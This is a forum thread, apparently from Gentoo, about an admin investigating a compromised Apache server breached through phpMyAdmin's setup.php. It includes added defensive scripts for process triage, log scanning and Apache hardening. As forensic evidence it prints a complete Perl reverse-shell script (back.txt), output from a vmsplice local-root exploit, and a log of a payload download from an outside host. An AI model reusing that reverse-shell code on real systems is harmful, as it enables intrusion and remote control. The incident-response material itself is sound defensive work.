# Found ./exploit running as apache

## newtonian

After Apache became non-responsive I ran htop and found that Apache, running from ./exploit, was using up all of the CPU.

I killed the processes and all was fine. I did a `find -name exploit -print` from the root directory, hoping to find a file called exploit, but nothing came up.

```
apache    2128 52.8  0.2  34028  3812 ?        R    Aug04 2039:58 /usr/sbin/apache/logs
apache    4302 61.4  0.1  21232  1732 ?        R    Aug03 3207:05 ./exploit
root      4779  0.0  0.0   7272   732 pts/3    R+   16:21   0:00 grep --colour=auto apache
apache   22869 57.8  0.1  21232  1732 ?        R    Aug03 2707:47 ./exploit
```

Anyone familiar with apache running a file called exploit?

Cheers,

----------

## msalerno

Who knows where it came from, but you are going to get lots of people telling you to wipe the box and reinstall.  You should have tried to get more info about the process before you killed it.

----------

## d2_racing

Indeed, now that the process is gone, maybe there is a way to find more info about that exploit file.

----------

## msalerno

Your situation inspired me to write up the following post:

https://forums.gentoo.org/viewtopic-p-6378504.html

----------

## Anarcho

And maybe it would have been better to really kill (kill -9) the process, as there might be a signal handler which deletes the file on SIGTERM.

But you should really try to find out by which route the exploit was uploaded to your filesystem. After that, reinstall the server and fix the problem!

----------

## Hu

As an addendum, if you want to stop the process, hit it with a SIGSTOP first.  That cannot be blocked, so unless it has a buddy to resume it, it will suspend in response to that.  After it is suspended, you can do initial forensics, and kill the process with a SIGKILL when you are done.  It may have unlinked itself upon startup, which would make it more difficult to get at the underlying program.

In the meantime, check your Apache access and error logs.  Perhaps you will get lucky and find what was used to upload the exploit bootstrap code.

----------
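Anarcho's warning about a SIGTERM handler and Hu's SIGSTOP-first advice fit in one small procedure. The script below is an added example, not something posted in the thread: it freezes the process, snapshots the `/proc` entries that the later posts read by hand (`exe`, `cwd`, `cmdline`, `environ`, `maps`, `fd`), copies the binary out through the `/proc/PID/exe` magic link (which still works after the file has been unlinked, exactly the "(deleted)" case seen below), and only then sends SIGKILL. It assumes a Linux `/proc` and coreutils, and that you run it as root or as the process owner.

```sh
#!/bin/sh
# triage_pid PID OUTDIR
# Freeze a suspicious process with SIGSTOP (cannot be caught or ignored),
# snapshot the /proc entries that matter for forensics, recover the binary
# through the /proc/PID/exe magic link even if the file was unlinked, and
# only then SIGKILL it.  Added example; assumes Linux /proc and coreutils.
# usage: triage_pid 22533 /root/evidence/22533
triage_pid() {
    pid=$1
    out=$2
    [ -d "/proc/$pid" ] || { echo "triage_pid: no such pid $pid" >&2; return 1; }
    mkdir -p "$out" || return 1

    # 1. Stop, do not kill: a SIGTERM handler could delete evidence first.
    kill -STOP "$pid" || return 1

    # 2. Where the binary and cwd live; "(deleted)" means the file was unlinked.
    readlink "/proc/$pid/exe" > "$out/exe.link"
    readlink "/proc/$pid/cwd" > "$out/cwd.link"

    # 3. cmdline and environ are NUL-separated; make them one entry per line.
    tr '\0' '\n' < "/proc/$pid/cmdline" > "$out/cmdline"
    tr '\0' '\n' < "/proc/$pid/environ" > "$out/environ" 2>/dev/null || :

    # 4. Mapped files, open descriptors (what lsof -p shows), process status.
    cat "/proc/$pid/maps" > "$out/maps"
    cat "/proc/$pid/status" > "$out/status"
    ls -l "/proc/$pid/fd" > "$out/fd.txt" 2>/dev/null || :

    # 5. The exe link resolves to the inode, not the path, so this works
    #    even after the attacker's rm: recover the binary and hash it.
    cp "/proc/$pid/exe" "$out/exe.bin" || return 1
    sha256sum "$out/exe.bin" > "$out/exe.sha256" 2>/dev/null || :

    # 6. Evidence captured; now terminate for real.
    kill -KILL "$pid"
}

# recovered_exe OUTDIR: path of the binary recovered by triage_pid
recovered_exe() { printf '%s\n' "$1/exe.bin"; }
```

Once the process is stopped you have all the time you need; `strace -p` on a stopped process shows nothing, so read the snapshot instead. If the binary was unlinked, `exe.bin` is the only copy you will get, so hash it before anything else touches it.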

## newtonian

Thanks for all of the awesome responses.

I found the same process running on another machine.  Here is the output of msalerno's guide:

https://forums.gentoo.org/viewtopic-p-6378504.html

```
lsof -p 22533

COMMAND   PID   USER   FD      TYPE             DEVICE      SIZE     NODE NAME
exploit 22533 apache  cwd       DIR                8,4         0  4317251 /var/tmp/xpl/32 (deleted)
exploit 22533 apache  rtd       DIR                8,4      4096        2 /
exploit 22533 apache  txt       REG                8,4     32618  4317256 /var/tmp/xpl/32/exploit (deleted)
exploit 22533 apache  mem       REG                8,4    114952  1220694 /lib64/ld-2.6.1.so
exploit 22533 apache  mem       REG                8,4     14528  1220708 /lib64/libdl-2.6.1.so
exploit 22533 apache  mem       REG                8,4   1293456  1220702 /lib64/libc-2.6.1.so
exploit 22533 apache  DEL       REG                8,4            4317260 /var/tmp/xpl/32/exp_cheddarbay.so
exploit 22533 apache  DEL       REG                8,4            4317332 /var/tmp/xpl/32/exp_ingom0wnar.so
exploit 22533 apache  DEL       REG                8,4            4317327 /var/tmp/xpl/32/exp_moosecox.so
exploit 22533 apache  DEL       REG                8,4            4317282 /var/tmp/xpl/32/exp_paokara.so
exploit 22533 apache  DEL       REG                8,4            4317259 /var/tmp/xpl/32/exp_powerglove.so
exploit 22533 apache  DEL       REG                8,4            4317281 /var/tmp/xpl/32/exp_therebel.so
exploit 22533 apache  DEL       REG                8,4            4317258 /var/tmp/xpl/32/exp_wunderbar.so
exploit 22533 apache    0u     sock                0,4           48181637 can't identify protocol
exploit 22533 apache    1u     sock                0,4           48181637 can't identify protocol
exploit 22533 apache    2u     sock                0,4           48181637 can't identify protocol
exploit 22533 apache    3w     FIFO                0,5           48181633 pipe
exploit 22533 apache    4u     IPv4           47576424                TCP *:http (LISTEN)
exploit 22533 apache    5r     FIFO                0,5           47576437 pipe
exploit 22533 apache    6w     FIFO                0,5           47576437 pipe
exploit 22533 apache    7w      REG                8,4      1281  3875216 /var/log/apache2/ssl_error_log
exploit 22533 apache    8w      REG                8,4 340378372  3876416 /var/log/apache2/access_log
exploit 22533 apache    9w      REG                8,4      2866  3875215 /var/log/apache2/ssl_access_log
exploit 22533 apache   10w      REG                8,4      3268  3875217 /var/log/apache2/ssl_request_log
exploit 22533 apache   11w      REG                8,4         0  4440068 /var/run/ssl_mutex (deleted)
exploit 22533 apache   12w      REG                8,4 808690834  3875212 /var/log/apache2/mod_jk.log
exploit 22533 apache   13u      REG                8,4     28800  3876429 /var/log/apache2/mod_jk.shm.22136 (deleted)
exploit 22533 apache   14u      REG                8,4         1  3876438 /var/log/apache2/mod_jk.shm.22136.lock (deleted)
exploit 22533 apache   15r     0000                0,9         0 47593281 eventpoll
exploit 22533 apache   16u     sock                0,4           47625594 can't identify protocol
exploit 22533 apache   17u     IPv4           47601843                TCP server.domain.com:33369->server.domain.com:8009 (CLOSE_WAIT)
exploit 22533 apache   18u     unix 0xffff8800711796c0           47598822 socket
exploit 22533 apache   19w     FIFO                0,5           48372130 pipe
exploit 22533 apache   21w  unknown                                       /proc/22533/fd/21 (readlink: No such file or directory)
```

```
dr-xr-xr-x   5 apache apache 0 Aug 11 13:35 .
dr-xr-xr-x 156 root   root   0 Apr 22 18:52 ..
dr-xr-xr-x   2 apache apache 0 Aug 11 16:19 attr
-r--------   1 apache apache 0 Aug 11 16:19 auxv
-r--r--r--   1 apache apache 0 Aug 11 16:18 cmdline
lrwxrwxrwx   1 apache apache 0 Aug 11 16:18 cwd -> /var/tmp/xpl/32 (deleted)
-r--------   1 apache apache 0 Aug 11 16:19 environ
lrwxrwxrwx   1 apache apache 0 Aug 11 16:18 exe -> /var/tmp/xpl/32/exploit (deleted)
dr-x------   2 apache apache 0 Aug 11 13:36 fd
-r--r--r--   1 apache apache 0 Aug 11 16:18 maps
-rw-------   1 apache apache 0 Aug 11 16:19 mem
-r--r--r--   1 apache apache 0 Aug 11 16:19 mounts
-r--------   1 apache apache 0 Aug 11 16:19 mountstats
-rw-r--r--   1 apache apache 0 Aug 11 16:19 oom_adj
-r--r--r--   1 apache apache 0 Aug 11 16:19 oom_score
lrwxrwxrwx   1 apache apache 0 Aug 11 16:18 root -> /
-rw-------   1 apache apache 0 Aug 11 16:19 seccomp
-r--r--r--   1 apache apache 0 Aug 11 16:19 smaps
-r--r--r--   1 apache apache 0 Aug 11 16:18 stat
-r--r--r--   1 apache apache 0 Aug 11 16:19 statm
-r--r--r--   1 apache apache 0 Aug 11 16:18 status
dr-xr-xr-x   3 apache apache 0 Aug 11 13:35 task
-r--r--r--   1 apache apache 0 Aug 11 16:19 wchan
```

strace -p 22533 reported this:

```
pipe([20, 21])                          = 0
close(20)                               = 0
close(21)                               = 0
pipe([20, 21])                          = 0
close(20)                               = 0
close(21)                               = 0
pipe([20, 21])                          = 0
close(20)                               = 0
close(21)                               = 0
pipe([20, 21])                          = 0
close(20)                               = 0
close(21)                               = 0
pipe([20, 21])                          = 0
close(20)                               = 0
close(21, 21])                          = 0
Process 22533 detached
```

```
echo CWD `readlink /proc/22533/cwd` > ~/procinfo.log
cat ~/procinfo.log
CWD /var/tmp/xpl/32 (deleted)
```

```
cat /proc/22533/cmdline
./exploit
```

```
cat /proc/22533/environ
SHELL=/bin/shDEFAULTLEVEL=defaultLC_ALL=en_US.UTF-8USER=rootPATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/bin:/binPWD=/var/tmp/xpl/32LANG=en_US.UTF-8BOOTLEVEL=bootSVCNAME=apache2CONSOLETYPE=serialSHLVL=5HOME=/rootSOFTLEVEL=default_=./exploit
```

I got lost at `cat /proc/<pid of process>/`, as that is a directory on my system, and I couldn't find any tar files around.

`lsof -p 22533` shows a few source files, and a Google search reveals that this is the Enlightenment hack. More googling led me to look in /var/tmp/

```
ls -la /var/tmp/
total 366468
drwxrwxrwt  5 root     root          4096 Aug  4 15:23 .
drwxr-xr-x 17 root     root          4096 Mar 14 02:51 ..
-rw-r--r--  1 apache   apache         317 Aug  4 15:21 1.txt
-rw-r--r--  1 apache   apache         317 Aug  4 15:22 2.txt
-rw-r--r--  1 apache   apache         317 Aug  4 15:23 3.txt
-rw-r--r--  1 apache   apache         892 Nov  6  2009 back.txt
drwxrwxr-x  2 portage  portage       4096 Jun  2 13:16 binpkgs
drwxrwxr-x  4 portage  portage       4096 Aug 11 15:38 portage
drwxrwxr-x  3 tomcat   tomcat        4096 Aug 10 22:56 tomcat-6
-rwxr-xr-x  1 apache   apache       10393 Feb  4  2010 vmsplic3
```

```
cat back.txt

#!/usr/bin/perl
use IO::Socket;
$system    = '/bin/bash';
$ARGC=@ARGV;
print "--== Fucking Machine ==-- \n\n";
if ($ARGC!=2) {
   print "Usage: $0 [Host] [Port] \n\n";
   die "Ex: $0 127.0.0.1 2121 \n";
}
use Socket;
use FileHandle;
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n";
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n";
print "[*] Spawning Shell \n";
SOCKET->autoflush();
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
print "--== Thuraya Team ==--  \n\n";
system("unset HISTFILE; unset SAVEFILE; unset HISTSAVE; history -n; unset WATCH; export HISTFILE=/dev/null ;echo --==Systeminfo==-- ; uname -a;echo;echo --==Uptime==--; w;echo;
echo --==Userinfo==-- ; id;echo;echo --==Directory==-- ; pwd;echo; echo --==Shell==-- ");
system($system);
```

```
cat 1.txt 2.txt 3.txt

-----------------------------------
 Linux vmsplice Local Root Exploit
 By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xf7e52000 .. 0xf7e84000
[-] wtf
-----------------------------------
 Linux vmsplice Local Root Exploit
 By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xf7e6f000 .. 0xf7ea1000
[-] wtf
-----------------------------------
 Linux vmsplice Local Root Exploit
 By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xf7e65000 .. 0xf7e97000
[-] wtf
```

found this in the error log:

```
--2010-08-04 00:00:11--  http://smenar.do.am/fuck.txt
Resolving smenar.do.am... 195.216.243.36
Connecting to smenar.do.am|195.216.243.36|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 17247 (17K) [text/plain]
Saving to: `fuck.txt'

     0K .......... ......                                     100% 24.6K=0.7s

2010-08-04 00:00:13 (24.6 KB/s) - `fuck.txt' saved [17247/17247]
```

looked for the file on the machine but it didn't exist.

Here is the call that uploaded the file to the server:

```
myserverip 66.7.208.173 - - [04/Aug/2010:00:00:17 +0900] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 200 14060 "http://210.48.255.38/phpmyadmin/scripts/setup.php" "Opera"
- 127.0.0.1 - - [04/Aug/2010:00:00:18 +0900] "OPTIONS * HTTP/1.0" 200 - "-" "Apache (internal dummy connection)"
```

```
emerge --search phpmyadmin
Searching...
[ Results for search key : phpmyadmin ]
[ Applications found : 1 ]

*  dev-db/phpmyadmin
      Latest version available: 2.11.10
      Latest version installed: 2.11.9.4
      Size of files: 2,172 kB
      Homepage:      http://www.phpmyadmin.net/
      Description:   Web-based administration for MySQL database in PHP
      License:       GPL-2
```

I'm not sure how they hacked through phpmyadmin setup.php, as I don't have a config directory.  I'll have to look for other hacks.

None of the files seem modified.

```
ls -l /var/www/localhost/htdocs/phpmyadmin/
total 1456
-rw-r--r--  2 root root  10873 2009-01-25 21:02 browse_foreigners.php
-rw-r--r--  2 root root    758 2009-01-25 21:02 calendar.php
-rw-r--r--  2 root root  31282 2009-01-25 21:02 ChangeLog
-rw-r--r--  2 root root   3459 2009-01-25 21:02 changelog.php
-rw-r--r--  2 root root    460 2009-01-25 21:02 chk_rel.php
-rw-r--r--  1 root root   1749 2009-01-25 21:09 config.inc.php
-rw-r--r--  2 root root   1751 2009-01-25 21:02 config.sample.inc.php
drwxr-xr-x  3 root root   4096 2009-01-25 21:02 contrib
-rw-r--r--  2 root root   1470 2009-01-25 21:02 db_create.php
-rw-r--r--  2 root root  10681 2009-01-25 21:02 db_datadict.php
-rw-r--r--  2 root root   2475 2009-01-25 21:02 db_export.php
-rw-r--r--  2 root root    471 2009-01-25 21:02 db_import.php
-rw-r--r--  2 root root  19871 2009-01-25 21:02 db_operations.php
-rw-r--r--  2 root root   7422 2009-01-25 21:02 db_printview.php
-rw-r--r--  2 root root  34751 2009-01-25 21:02 db_qbe.php
-rw-r--r--  2 root root  13999 2009-01-25 21:02 db_search.php
-rw-r--r--  2 root root    999 2009-01-25 21:02 db_sql.php
-rw-r--r--  2 root root  22432 2009-01-25 21:02 db_structure.php
-rw-r--r--  2 root root   4583 2009-01-25 21:02 docs.css
-rw-r--r--  2 root root 222262 2009-01-25 21:02 Documentation.html
-rw-r--r--  2 root root 157063 2009-01-25 21:02 Documentation.txt
-rw-r--r--  2 root root   2167 2009-01-25 21:02 error.php
-rw-r--r--  2 root root  24843 2009-01-25 21:02 export.php
-rw-r--r--  2 root root  18902 2009-01-25 21:02 favicon.ico
-rw-r--r--  2 root root  13934 2009-01-25 21:02 import.php
-rw-r--r--  2 root root   6586 2009-01-25 21:02 index.php
drwxr-xr-x  2 root root   4096 2009-01-25 21:02 js
drwxr-xr-x  2 root root   4096 2009-01-25 21:02 lang
drwxr-xr-x 10 root root   4096 2009-01-25 21:21 libraries
-rw-r--r--  2 root root    411 2009-01-25 21:02 license.php
-rw-r--r--  2 root root  15889 2009-01-25 21:02 main.php
-rw-r--r--  2 root root  26259 2009-01-25 21:02 navigation.php
-rw-r--r--  2 root root  27182 2009-01-25 21:02 pdf_pages.php
-rw-r--r--  2 root root  52735 2009-01-25 21:02 pdf_schema.php
-rw-r--r--  2 root root    360 2009-01-25 21:02 phpinfo.php
-rw-r--r--  2 root root  16613 2009-01-25 21:02 phpmyadmin.css.php
drwxr-xr-x  5 root root   4096 2009-01-25 21:02 pmd
-rw-r--r--  2 root root  11227 2009-01-25 21:02 pmd_common.php
-rw-r--r--  2 root root   1917 2009-01-25 21:02 pmd_display_field.php
-rw-r--r--  2 root root  18486 2009-01-25 21:02 pmd_general.php
-rw-r--r--  2 root root    880 2009-01-25 21:02 pmd_help.php
-rw-r--r--  2 root root   3372 2009-01-25 21:02 pmd_pdf.php
-rw-r--r--  2 root root   3942 2009-01-25 21:02 pmd_relation_new.php
-rw-r--r--  2 root root   1901 2009-01-25 21:02 pmd_relation_upd.php
-rw-r--r--  2 root root   2248 2009-01-25 21:02 pmd_save_pos.php
-rw-r--r--  2 root root   1063 2009-01-25 21:02 print.css
-rw-r--r--  2 root root   9722 2009-01-25 21:02 querywindow.php
-rw-r--r--  2 root root    403 2009-01-25 21:02 readme.php
drwxr-xr-x  2 root root   4096 2009-01-25 21:02 scripts
-rw-r--r--  2 root root   7653 2009-01-25 21:02 server_binlog.php
-rw-r--r--  2 root root   2784 2009-01-25 21:02 server_collations.php
-rw-r--r--  2 root root  13284 2009-01-25 21:02 server_databases.php
-rw-r--r--  2 root root   4917 2009-01-25 21:02 server_engines.php
-rw-r--r--  2 root root   1639 2009-01-25 21:02 server_export.php
-rw-r--r--  2 root root    486 2009-01-25 21:02 server_import.php
-rw-r--r--  2 root root 110708 2009-01-25 21:02 server_privileges.php
-rw-r--r--  2 root root   2869 2009-01-25 21:02 server_processlist.php
-rw-r--r--  2 root root    581 2009-01-25 21:02 server_sql.php
-rw-r--r--  2 root root  20731 2009-01-25 21:02 server_status.php
-rw-r--r--  2 root root   2462 2009-01-25 21:02 server_variables.php
-rw-r--r--  2 root root    317 2009-01-25 21:02 show_config_errors.php
-rw-r--r--  2 root root  29485 2009-01-25 21:02 sql.php
-rw-r--r--  2 root root   9097 2009-01-25 21:02 tbl_addfield.php
-rw-r--r--  2 root root   9463 2009-01-25 21:02 tbl_alter.php
-rw-r--r--  2 root root  46319 2009-01-25 21:02 tbl_change.php
-rw-r--r--  2 root root   9322 2009-01-25 21:02 tbl_create.php
-rw-r--r--  2 root root   2594 2009-01-25 21:02 tbl_export.php
-rw-r--r--  2 root root    635 2009-01-25 21:02 tbl_import.php
-rw-r--r--  2 root root  15997 2009-01-25 21:02 tbl_indexes.php
-rw-r--r--  2 root root   2186 2009-01-25 21:02 tbl_move_copy.php
-rw-r--r--  2 root root  19804 2009-01-25 21:02 tbl_operations.php
-rw-r--r--  2 root root  18270 2009-01-25 21:02 tbl_printview.php
-rw-r--r--  2 root root  24311 2009-01-25 21:02 tbl_relation.php
-rw-r--r--  2 root root  12626 2009-01-25 21:02 tbl_replace.php
-rw-r--r--  2 root root   4423 2009-01-25 21:02 tbl_row_action.php
-rw-r--r--  2 root root  17905 2009-01-25 21:02 tbl_select.php
-rw-r--r--  2 root root    939 2009-01-25 21:02 tbl_sql.php
-rw-r--r--  2 root root  34710 2009-01-25 21:02 tbl_structure.php
drwxr-xr-x  2 root root   4096 2009-01-25 21:02 test
drwxr-xr-x  4 root root   4096 2009-01-25 21:02 themes
-rw-r--r--  2 root root   1096 2009-01-25 21:02 themes.php
-rw-r--r--  2 root root   1752 2009-01-25 21:02 transformation_overview.php
-rw-r--r--  2 root root   4068 2009-01-25 21:02 transformation_wrapper.php
-rw-r--r--  2 root root   8209 2009-01-25 21:02 translators.html
-rw-r--r--  2 root root   3573 2009-01-25 21:02 user_password.php
-rw-r--r--  2 root root   4215 2009-01-25 21:02 view_create.php
```

So now I have to figure out how they got in via phpmyadmin setup.php, what and where fuck.txt is, and whether or not the vmsplice Local Root Exploit works on this xen kernel.  Then rebuild the machine from scratch.  : P  Ouch...

Thanks for all the help so far guys.

Cheers,

----------
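Hu's advice to check the Apache access log, and the single log line above that newtonian pulled out by hand, both come down to one question: who touched phpMyAdmin's setup script, and with which method? The script below is an added example, not part of the thread: an awk filter that prints `IP METHOD PATH STATUS` for every request to `scripts/setup.php`, and copes with both the plain combined format and the vhost-prefixed format shown above (an extra leading token before the client IP). The sample log is constructed: the two lines from the post plus two made-up entries on RFC 5737 addresses, one POST hit and one unrelated request.

```sh
#!/bin/sh
# scan_access_log FILE
# Hunt an Apache access log for requests to phpMyAdmin's setup script.
# Prints one line per hit: "IP METHOD PATH STATUS".  Handles both the plain
# combined format and the vhost-prefixed variant seen in the thread.
# Added example; assumes only POSIX sh and awk.
scan_access_log() {
    awk -F'"' '
    {
        split($2, req, " ")                 # $2 = "METHOD PATH PROTO"
        path = req[2]
        if (path !~ "/scripts/setup\\.php(\\?|$)") next
        # client IP = the token just before the "- -" ident/user fields in $1
        n = split($1, pre, " ")
        ip = "?"
        for (i = 2; i <= n - 2; i++)
            if (pre[i] == "-" && pre[i + 1] == "-") { ip = pre[i - 1]; break }
        split($3, rest, " ")                # $3 = " STATUS BYTES "
        print ip, req[1], path, rest[1]
    }' "$1"
}

# Constructed sample: the two lines quoted in the thread plus two made-up
# entries (RFC 5737 addresses) covering a POST hit and a non-hit.
sample_log() {
    cat <<'EOF'
myserverip 66.7.208.173 - - [04/Aug/2010:00:00:17 +0900] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 200 14060 "http://210.48.255.38/phpmyadmin/scripts/setup.php" "Opera"
- 127.0.0.1 - - [04/Aug/2010:00:00:18 +0900] "OPTIONS * HTTP/1.0" 200 - "-" "Apache (internal dummy connection)"
203.0.113.9 - - [04/Aug/2010:00:00:25 +0900] "POST /phpmyadmin/scripts/setup.php HTTP/1.1" 200 1512 "-" "Mozilla/5.0"
198.51.100.7 - - [04/Aug/2010:00:02:00 +0900] "GET /index.html HTTP/1.1" 200 512 "-" "curl/7.19.7"
EOF
}

# Real use:  scan_access_log /var/log/apache2/access_log
# Demo on the constructed sample:  sh thisfile.sh --demo
if [ "${1:-}" = "--demo" ]; then
    f=$(mktemp); sample_log > "$f"; scan_access_log "$f"; rm -f "$f"
fi
```

A GET to `setup.php` is only reconnaissance; the POSTs that follow it are where the setup script is made to do something, so sort the output by IP and look at what each address did next. The referer in the thread's line points at a different host with the identical path, which is the fingerprint of a mass scanner rather than a human.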

## Anon-E-moose

I don't run phpmyadmin, but for anything that I don't want the world to see, I keep localhost separate under /var/www/ and put things that I don't want the world to know about there.

----------

## msalerno

Have you checked the phpmyadmin site to see if there are any security issues with the version you are running?

You could also do a "glsa-check --test all" and see what gets returned.

----------

## Hu

 *newtonian wrote:*   

> More googling led me to look in /var/tmp/
> 
> ```
> ls -la /var/tmp/
> 
> ...

Some of those suspicious files have rather old mtimes.  This is not definitive since an mtime can be changed to an arbitrary value at will, but it could mean that you have been successfully attacked some time ago.

PHP is a frequent source of security problems.  I suggest making some changes on the rebuilt server to restrict access to it.  Make at least one of these changes, if at all possible.  Layering several together is probably overkill, but has no significant technical drawbacks.

- If possible, serve it from a VirtualHost that listens only to localhost.
- Use Apache configuration directives to require HTTP-based authentication to access any file in the phpmyadmin directory hierarchy.  This will provide some basic protection if an authentication bypass is found in phpmyadmin, since the attacker must still have a valid HTTP login to get past the Apache check.
- Require HTTPS to access the site that serves phpmyadmin.  This protects the credentials from the previous bullet, and may also cause some attackers to miss the presence of the directory if they probe only sites served over HTTP.
- Install to a directory with a non-standard name, such as /admin.2eD6pw/phpmyadmin/ and do not provide any publicly readable hyperlinks that point to this directory.  Choose the upper level directory name by combining a useful string ("admin") with a random string (to discourage guessing).  This is a crude form of security by obscurity, but it should prevent bots from just wandering in.

----------
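The four controls Hu lists translate into a short Apache 2.2 configuration (the version Gentoo shipped at the time of this thread). The fragment below is an added example, not from Hu's post or from phpMyAdmin's documentation; the hostname db.example.com, the certificate and htpasswd paths, and the admin subnet are assumptions, while the phpMyAdmin install path is the one shown earlier in the thread. The weak, world-reachable alias is kept at the top, commented out, for contrast.

```apache
# --- weak: phpMyAdmin at a guessable path, reachable by anyone, over plain HTTP
# Alias /phpmyadmin /var/www/localhost/htdocs/phpmyadmin

# --- hardened (Apache 2.2 syntax; see note below for 2.4) ---

# Strongest option: a vhost bound to the loopback address only, reached over
# an SSH tunnel.  Enable this instead of the *:443 vhost if remote access is
# not needed.
# Listen 127.0.0.1:8443
# <VirtualHost 127.0.0.1:8443>
#     SSLEngine on
#     ...same Alias/Directory block as below...
# </VirtualHost>

# Plain-HTTP vhost: send everything to HTTPS so Basic-auth credentials never
# travel in clear.  Nothing is served here.
<VirtualHost *:80>
    ServerName db.example.com
    Redirect permanent / https://db.example.com/
</VirtualHost>

<VirtualHost *:443>
    ServerName db.example.com
    SSLEngine on
    SSLCertificateFile    /etc/ssl/apache2/server.crt   # assumed paths
    SSLCertificateKeyFile /etc/ssl/apache2/server.key

    # Non-guessable path: meaningful prefix plus random suffix, never linked.
    Alias /admin.2eD6pw/phpmyadmin /var/www/localhost/htdocs/phpmyadmin

    <Directory /var/www/localhost/htdocs/phpmyadmin>
        # Apache-level login in front of phpMyAdmin's own authentication.
        AuthType Basic
        AuthName "Database administration"
        AuthUserFile /etc/apache2/pma.htpasswd            # htpasswd -c ... admin
        Require valid-user

        # And a source restriction; 203.0.113.0/24 stands in for your admin subnet.
        Order deny,allow
        Deny from all
        Allow from 127.0.0.1 ::1 203.0.113.0/24
        Satisfy all          # both the login AND the address check must pass
    </Directory>

    # The setup script is an installer, not a runtime component: never serve it.
    <Directory /var/www/localhost/htdocs/phpmyadmin/scripts>
        Order deny,allow
        Deny from all
    </Directory>
</VirtualHost>
```

On Apache 2.4 the `Order`/`Deny`/`Allow`/`Satisfy` lines become `Require all denied`, `Require ip 127.0.0.1 ::1 203.0.113.0/24` and `Require valid-user` inside a `<RequireAll>` block; everything else is unchanged. Whichever version you run, check the result with `curl -k https://db.example.com/admin.2eD6pw/phpmyadmin/scripts/setup.php` and make sure it is a 403 before you put the box back on the network.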

## Anon-E-moose

I would also lock down the directories and any password or other sensitive files from being read.

I used vhosts on my system, with separate directories for localhost and my dns name.

----------

## Tony Schwartz

I tracked this down to a known exploit in phpMyAdmin.

The problem for me was that I did not remove the setup.php script from the scripts directory in the phpMyAdmin installation.

There is a known exploit that is described here:  http://www.nessus.org/plugins/index.php?view=single&id=48908

The problem allows an attacker to execute arbitrary PHP code.

For me, it was pretty easy to clean the components of this problem by removing the scripts from the /tmp directory that were generated.  See the .mysql.log directory and any other scripts in the tmp directory.  Kill apache, make sure your phpMyAdmin doesn't have a setup.php script, and make sure all your httpd processes are dead, and the /usr/sbin/apache/*** processes are dead too.  Then, safely restart httpd.

Hope this helps.

T

----------
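Tony Schwartz's cleanup checklist (dead httpd and `/usr/sbin/apache/*` processes, nothing left in tmp, no setup.php) can be turned into a quick audit. The functions below are an added example, not posted in the thread: the first lists every process whose executable has been unlinked or whose working directory sits in a world-writable temp directory, the two signs that gave `./exploit` away in the lsof output earlier; the second finds any copy of phpMyAdmin's setup script still under a document root. Both assume a Linux `/proc`; run the first as root to see every user's processes, since `/proc/PID/exe` of another user's process is not readable otherwise.

```sh
#!/bin/sh
# hunt_suspect_procs
# List processes whose binary was unlinked ("(deleted)" in /proc/PID/exe) or
# whose cwd is under /tmp, /var/tmp or /dev/shm.  Output: "PID UID FLAGS EXE CWD".
# Added example; assumes Linux /proc.  Run as root for full coverage.
hunt_suspect_procs() {
    for d in /proc/[0-9]*; do
        pid=${d#/proc/}
        exe=$(readlink "$d/exe" 2>/dev/null) || continue   # kernel thread, or gone
        cwd=$(readlink "$d/cwd" 2>/dev/null) || cwd='?'
        flags=''
        case "$exe" in *"(deleted)"*) flags='deleted-exe' ;; esac
        case "$cwd" in
            /tmp/*|/var/tmp/*|/dev/shm/*|/tmp|/var/tmp|/dev/shm)
                flags="${flags:+$flags,}tmp-cwd" ;;
        esac
        [ -n "$flags" ] || continue
        uid=$(awk '/^Uid:/ { print $2 }' "$d/status" 2>/dev/null) || uid='?'
        printf '%s %s %s %s %s\n' "$pid" "${uid:-?}" "$flags" "$exe" "$cwd"
    done
}

# leftover_setup_scripts DOCROOT
# Print every phpMyAdmin setup script still present below DOCROOT.
leftover_setup_scripts() {
    find "$1" -path '*/scripts/setup.php' -type f 2>/dev/null
}

# Typical use on the rebuilt box:
#   hunt_suspect_procs
#   leftover_setup_scripts /var/www
```

Anything `hunt_suspect_procs` prints deserves a look before it is killed; a legitimate daemon that was upgraded while running also shows "(deleted)", so compare the path and owner against what the package manager installed rather than killing on sight.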

## molot

Depending on your PHP settings, "arbitrary PHP code" might be enough to set up another backdoor. Hardly possible, but possible. Check twice for any traces of edits like that.

Hope you'll be OK.

----------

